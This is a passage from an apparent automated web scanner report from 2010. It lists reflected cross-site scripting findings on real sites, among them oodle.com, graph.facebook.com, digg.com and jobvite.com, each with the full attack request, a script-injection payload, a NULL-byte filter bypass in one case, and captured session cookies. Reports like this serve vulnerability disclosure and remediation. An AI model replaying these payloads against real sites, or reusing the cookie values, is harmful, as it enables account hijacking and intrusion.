GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=19023264b53f'-alert(1)-'8da6aa1da61&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=2852E1A6434EA6C41698204505472C2A; Path=/ Content-Type: text/javascript Content-Length: 1461 Date: Fri, 26 Nov 2010 20:48:07 GMT Connection: close
The value of the ucm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 940af'-alert(1)-'caed2744f52 was submitted in the ucm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true940af'-alert(1)-'caed2744f52&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=D71F3A1FA2BE70625EF7DB153BC05BDF; Path=/ Content-Type: text/javascript Content-Length: 1461 Date: Fri, 26 Nov 2010 20:48:10 GMT Connection: close
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b776'-alert(1)-'0a793856171 was submitted in the w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=3004b776'-alert(1)-'0a793856171&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com.47127.9349.302br.net Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7177602B0001A163BE5AC5B095B0D2A2; Path=/ Content-Type: text/javascript Content-Length: 1461 Date: Fri, 26 Nov 2010 20:48:08 GMT Connection: close
1.65. http://cars.oodle.com/regions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cars.oodle.com
Path:
/regions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8271a"-alert(1)-"6e4e879ee95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /regions/?8271a"-alert(1)-"6e4e879ee95=1 HTTP/1.1 Host: cars.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:52:25 GMT Content-Length: 22950 Connection: close Set-Cookie: otu=216f76b7a172d795acd2dd4f0659eeac; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=277786c3bca49e4c005d428276173f90; path=/; domain=.oodle.com Set-Cookie: a=dT1GQUJFQzFBMzRDRjAxRTBB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODA0NzQ2O30%3D; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ad931"><script>alert(1)</script>1d575234271 was submitted in the REST URL parameter 1. This input was echoed as ad931"><script>alert(1)</script>1d575234271 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00ad931"><script>alert(1)</script>1d575234271 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1dcce<script>alert(1)</script>8fc36335893 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.nypost.com/p.json?callback=_ate.ad.hpr1dcce<script>alert(1)</script>8fc36335893&uid=4cb0ff004a7b228e&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fpagesix%2Fjay_writes_letter_of_recommendation_CNwrClodED5mSnnGp8x1jL&nceyx7 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh28.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; di=%7B%222%22%3A%221618482233066729%2CrnoX2ky07x0ACKAn%22%7D..1290798894.10R|1290723636.60|1290701111.66; dt=X; psc=4; uid=4cb0ff004a7b228e
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Fri, 26 Nov 2010 20:48:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 26 Nov 2010 20:48:26 GMT Connection: close
1.68. http://forsale.oodle.com/regions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forsale.oodle.com
Path:
/regions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b1f8"-alert(1)-"73257e21799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /regions/?5b1f8"-alert(1)-"73257e21799=1 HTTP/1.1 Host: forsale.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:55:30 GMT Content-Length: 22721 Connection: close Set-Cookie: otu=383767212dc280a74a863da5f3602de0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=55000a2dee5d9759214579489b8faf0d; path=/; domain=.oodle.com Set-Cookie: a=dT1GMzBCRjFGODRDRjAxRUMz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODA0OTMxO30%3D; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 991bf<img%20src%3da%20onerror%3dalert(1)>c41e23e615 was submitted in the REST URL parameter 1. This input was echoed as 991bf<img src=a onerror=alert(1)>c41e23e615 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /100001833502192991bf<img%20src%3da%20onerror%3dalert(1)>c41e23e615/picture/ HTTP/1.1 Host: graph.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/javascript; charset=UTF-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 100001833502192991bf<img src=a onerror=alert(1)>c41e23e615" Connection: close Date: Fri, 26 Nov 2010 20:41:18 GMT Content-Length: 187
{ "error": { "type": "OAuthException", "message": "(#803) Some of the aliases you requested do not exist: 100001833502192991bf<img src=a onerror=alert(1)>c41e23e615" } }
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b8f9b<script>alert(1)</script>cc89cf21ad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /100001833502192/pictureb8f9b<script>alert(1)</script>cc89cf21ad5/ HTTP/1.1 Host: graph.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;
Response
HTTP/1.1 400 Bad Request Cache-Control: no-store Content-Type: text/javascript; charset=UTF-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /pictureb8f9b<script>alert(1)</script>cc89cf21ad5/" Connection: close Date: Fri, 26 Nov 2010 20:41:18 GMT Content-Length: 149
The value of the type request parameter is copied into the HTML document as plain text between tags. The payload ca8ff<script>alert(1)</script>815bd4131c7 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /100001833502192/picture/?type=squareca8ff<script>alert(1)</script>815bd4131c7 HTTP/1.1 Host: graph.facebook.com Proxy-Connection: keep-alive Referer: http://www.oodle.com/?cc5be%22%3E%3Cscript%3Ealert(1)%3C/script%3E54f964f95d1=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; lu=ggftxSNqSz1U2scgA_0e4w5A; c_user=100001495440690; sct=1289346776; sid=1; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; wd=295x25
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8543f<img%20src%3da%20onerror%3dalert(1)>ee45f9fcf54 was submitted in the REST URL parameter 1. This input was echoed as 8543f<img src=a onerror=alert(1)>ee45f9fcf54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /15302705298543f<img%20src%3da%20onerror%3dalert(1)>ee45f9fcf54/picture/ HTTP/1.1 Host: graph.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/javascript; charset=UTF-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 15302705298543f<img src=a onerror=alert(1)>ee45f9fcf54" Connection: close Date: Fri, 26 Nov 2010 20:41:18 GMT Content-Length: 183
{ "error": { "type": "OAuthException", "message": "(#803) Some of the aliases you requested do not exist: 15302705298543f<img src=a onerror=alert(1)>ee45f9fcf54" } }
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a1b57<script>alert(1)</script>d2a58a8d4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1530270529/picturea1b57<script>alert(1)</script>d2a58a8d4f1/ HTTP/1.1 Host: graph.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;
Response
HTTP/1.1 400 Bad Request Cache-Control: no-store Content-Type: text/javascript; charset=UTF-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /picturea1b57<script>alert(1)</script>d2a58a8d4f1/" Connection: close Date: Fri, 26 Nov 2010 20:41:19 GMT Content-Length: 149
The value of the type request parameter is copied into the HTML document as plain text between tags. The payload cb18e<script>alert(1)</script>76414bff0d7 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1530270529/picture/?type=squarecb18e<script>alert(1)</script>76414bff0d7 HTTP/1.1 Host: graph.facebook.com Proxy-Connection: keep-alive Referer: http://www.oodle.com/?cc5be%22%3E%3Cscript%3Ealert(1)%3C/script%3E54f964f95d1=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; lu=ggftxSNqSz1U2scgA_0e4w5A; c_user=100001495440690; sct=1289346776; sid=1; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; wd=295x25
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 325bc<img%20src%3da%20onerror%3dalert(1)>b3132b40c0 was submitted in the REST URL parameter 1. This input was echoed as 325bc<img src=a onerror=alert(1)>b3132b40c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /21488703512325bc<img%20src%3da%20onerror%3dalert(1)>b3132b40c0/picture/ HTTP/1.1 Host: graph.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/javascript; charset=UTF-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 21488703512325bc<img src=a onerror=alert(1)>b3132b40c0" Connection: close Date: Fri, 26 Nov 2010 20:41:18 GMT Content-Length: 183
{ "error": { "type": "OAuthException", "message": "(#803) Some of the aliases you requested do not exist: 21488703512325bc<img src=a onerror=alert(1)>b3132b40c0" } }
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92bff<script>alert(1)</script>dea8e2a2b80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /21488703512/picture92bff<script>alert(1)</script>dea8e2a2b80/ HTTP/1.1 Host: graph.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;
Response
HTTP/1.1 400 Bad Request Cache-Control: no-store Content-Type: text/javascript; charset=UTF-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /picture92bff<script>alert(1)</script>dea8e2a2b80/" Connection: close Date: Fri, 26 Nov 2010 20:41:18 GMT Content-Length: 149
The value of the type request parameter is copied into the HTML document as plain text between tags. The payload 2f219<script>alert(1)</script>88946a24d08 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /21488703512/picture/?type=square2f219<script>alert(1)</script>88946a24d08 HTTP/1.1 Host: graph.facebook.com Proxy-Connection: keep-alive Referer: http://apartments.classifieds.nypost.com/for-rent/apartments-for-rent/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; lu=ggftxSNqSz1U2scgA_0e4w5A; c_user=100001495440690; sct=1289346776; sid=1; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; wd=295x25
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ea3f<img%20src%3da%20onerror%3dalert(1)>06ff2464298 was submitted in the REST URL parameter 1. This input was echoed as 3ea3f<img src=a onerror=alert(1)>06ff2464298 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /234180603ea3f<img%20src%3da%20onerror%3dalert(1)>06ff2464298/picture/ HTTP/1.1 Host: graph.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Type: text/javascript; charset=UTF-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 234180603ea3f<img src=a onerror=alert(1)>06ff2464298" Connection: close Date: Fri, 26 Nov 2010 20:41:18 GMT Content-Length: 181
{ "error": { "type": "OAuthException", "message": "(#803) Some of the aliases you requested do not exist: 234180603ea3f<img src=a onerror=alert(1)>06ff2464298" } }
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 692ff<script>alert(1)</script>20a0b20959 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /23418060/picture692ff<script>alert(1)</script>20a0b20959/ HTTP/1.1 Host: graph.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;
Response
HTTP/1.1 400 Bad Request Cache-Control: no-store Content-Type: text/javascript; charset=UTF-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /picture692ff<script>alert(1)</script>20a0b20959/" Connection: close Date: Fri, 26 Nov 2010 20:41:19 GMT Content-Length: 148
The value of the type request parameter is copied into the HTML document as plain text between tags. The payload c019e<script>alert(1)</script>795e8c4f361 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /23418060/picture/?type=squarec019e<script>alert(1)</script>795e8c4f361 HTTP/1.1 Host: graph.facebook.com Proxy-Connection: keep-alive Referer: http://www.oodle.com/?cc5be%22%3E%3Cscript%3Ealert(1)%3C/script%3E54f964f95d1=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; lu=ggftxSNqSz1U2scgA_0e4w5A; c_user=100001495440690; sct=1289346776; sid=1; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; wd=295x25
1.81. http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hire.jobvite.com
Path:
/CompanyJobs/Careers.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1724a</script><script>alert(1)</script>875ecd07757 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CompanyJobs/Careers.aspx?k=Job&c=qOX9Vfwz&j=o6HvVfwX&s=IndeedSponsored&1724a</script><script>alert(1)</script>875ecd07757=1 HTTP/1.1 Host: hire.jobvite.com Proxy-Connection: keep-alive Referer: http://burp/show/6 Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=vqmcag45nadz14ia3kooz3y4
1.82. http://hire.jobvite.com/CompanyJobs/Job.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hire.jobvite.com
Path:
/CompanyJobs/Job.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dddb1</script><script>alert(1)</script>ff1e578fabf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CompanyJobs/Job.aspx?c=qOX9Vfwz&j=o6HvVfwX&s=IndeedSponsored&dddb1</script><script>alert(1)</script>ff1e578fabf=1 HTTP/1.1 Host: hire.jobvite.com Proxy-Connection: keep-alive Referer: http://burp/show/6 Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.83. http://img.pulsemgr.com/script/pm/100/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://img.pulsemgr.com
Path:
/script/pm/100/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29c84"-alert(1)-"471c5bcaf02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
